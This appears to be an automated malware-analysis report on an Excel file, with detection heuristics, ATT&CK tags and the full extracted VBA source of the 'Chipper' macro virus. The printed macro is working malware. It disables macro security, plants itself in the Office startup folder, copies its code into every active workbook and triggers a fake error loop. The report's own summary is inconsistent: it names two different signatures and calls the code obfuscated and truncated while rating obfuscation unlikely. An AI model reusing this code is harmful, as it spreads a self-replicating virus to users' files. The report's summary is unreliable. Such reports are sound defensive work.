MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV with multiple signatures indicating it is a Trojan. The VBA macro code attempts to modify the Word security level and save a file named 'Book1.' to the application startup path, suggesting an attempt to establish persistence. The macro also appears to be obfuscated and truncated, making a full analysis difficult.
Heuristics 2
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2831 bytes |

SHA-256: 55158d4f2565cc0e28605f49f0d0cae9888ecd8b2c597d8a8920ae5dfb0ca2cf
Detection: ClamAV: Xls.Trojan.Chip-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'
Private Sub Workbook_Deactivate()
' Chipper By The WalruS
' v1.00 09/00
On Error Resume Next
With Application
.DisplayAlerts = 0
.ScreenUpdating = 0
.DisplayStatusBar = 0
.UserName = "The WalruS"
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Installed = Dir(Application.StartupPath & "\Book1.")
If Installed = "" Then
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
End If
Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If ActiveWB.Lines(1, 1) <> "'" Then
ActiveWB.DeleteLines 1, ActiveWB.CountofLines
ActiveWB.InsertLines 1, ThisWB.Lines(1, ThisWB.CountofLines)
Application.Caption = "Time For Chipper To Move On!"
With ActiveWorkbook
.Title = "Chipper"
.Author = "The WalruS"
End With
ActiveWorkbook.Save
End If
If Second(Now) > 58 Then
MsgBox "Shutdown Error On Previous Close", vbCritical, "Chipper"
Do
DoEvents
Randomize
If Int(Rnd * 10000) = 2 Then
Application.WindowState = xlMinimized
Application.WindowState = xlMaximized
End If
Loop
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True